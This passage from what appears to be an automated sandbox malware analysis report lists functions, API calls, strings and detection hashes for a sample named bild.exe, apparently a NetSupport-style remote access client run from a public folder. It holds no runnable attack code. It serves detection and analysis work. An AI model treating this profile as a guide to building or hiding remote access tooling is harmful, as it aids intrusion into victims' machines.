                                                                                      • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                      Function 6C5D4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
                                                                                      • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                      • String ID: EnumProcessModules
                                                                                      • API String ID: 3858832252-3735562946
                                                                                      • Opcode ID: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
                                                                                      • Instruction ID: 1f45313c9618d1b82b77f5c4991c8e3b0a8d42ff715d9f74dc5a394723b8855a
                                                                                      • Opcode Fuzzy Hash: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
                                                                                      • Instruction Fuzzy Hash: 0AF05E76604318AFCB10DF99D844E5B77A8EB48722F00C91AF959D7A40C770E810CFA4
                                                                                      Function 6C5D5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D503D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorFileLastModuleNameProc
                                                                                      • String ID: GetModuleFileNameExA
                                                                                      • API String ID: 4084229558-758377266
                                                                                      • Opcode ID: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
                                                                                      • Instruction ID: b668353775b84e478f8563f09fc45590e4c1a8c49a3114c32819ef85dfabe2bd
                                                                                      • Opcode Fuzzy Hash: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
                                                                                      • Instruction Fuzzy Hash: BCF05EB2A15318AFCB20CF98E844E5777B8EB48712F00491AF946D7A40C671F8108BE5
                                                                                      Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                      • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleThread__wcstoi64
                                                                                      • String ID: *AutoICFConfig$Client
                                                                                      • API String ID: 3257255551-59951473
                                                                                      • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                      • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                      Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                      • String ID: Push
                                                                                      • API String ID: 1566154052-4278761818
                                                                                      • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                      • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                      Function 6C5DA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
                                                                                      • Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                      • String ID:
                                                                                      • API String ID: 4212191310-0
                                                                                      • Opcode ID: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
                                                                                      • Instruction ID: 6ce86c6274da148b161707994638ed71208ef8689c4a0a7f58997b6c95419f75
                                                                                      • Opcode Fuzzy Hash: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
                                                                                      • Instruction Fuzzy Hash: 8C21A1B2A00300EFDF119B1ECC8269BB7B8ABC631AF160527D85693E51D771B9408B59
                                                                                      Function 004B1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 004B1027
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 004B107B
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 004B1096
                                                                                      • ExitProcess.KERNEL32 ref: 004B10A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4161045215.00000000004B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004B0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4160974107.00000000004B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_4b0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                      • String ID:
                                                                                      • API String ID: 2164999147-0
                                                                                      • Opcode ID: c8380fc8b7a9bb1e0314ce0ace8c6e8214bf07186bff5c90b1d3a785b2fc9413
                                                                                      • Instruction ID: 6060780b13e5b668971955b615befdb95331e0e062bfc026d6c7cd8391be33ed
                                                                                      • Opcode Fuzzy Hash: c8380fc8b7a9bb1e0314ce0ace8c6e8214bf07186bff5c90b1d3a785b2fc9413
                                                                                      • Instruction Fuzzy Hash: 5D11E5204083C85BEB317F7489A87EBBFA55F13384FA40056D9D696766C25A48C7C37D
                                                                                      Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1314093303-0
                                                                                      • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                      • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                      Function 6C5D5C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ioctlsocket.WSOCK32(939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D1F
                                                                                      • select.WSOCK32(00000001,?,00000000,?,00000000,939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ioctlsocketselect
                                                                                      • String ID: a3^l
                                                                                      • API String ID: 1457273030-3838789914
                                                                                      • Opcode ID: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                      • Instruction ID: 1ce468167fe70463d1bb97893f50ce00efcffce07f53c34d7d8f41d98ebfc4fe
                                                                                      • Opcode Fuzzy Hash: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                      • Instruction Fuzzy Hash: 4B213370A013188BEB28DF18CD547DDB7B9EF84304F4081DAA80957681D7705F95DF90
                                                                                      Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess
                                                                                      • String ID: C:\Users\Public\Netstat\bild.exe
                                                                                      • API String ID: 2251294070-3316297413
                                                                                      • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                      • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                      Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • _memset.LIBCMT ref: 1110F4D2
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp
                                                                                      • API String ID: 2803934178-2363596943
                                                                                      • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                      • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                      Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: \\.\NSWFPDrv
                                                                                      • API String ID: 3498533004-85019792
                                                                                      • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                      • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                      Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
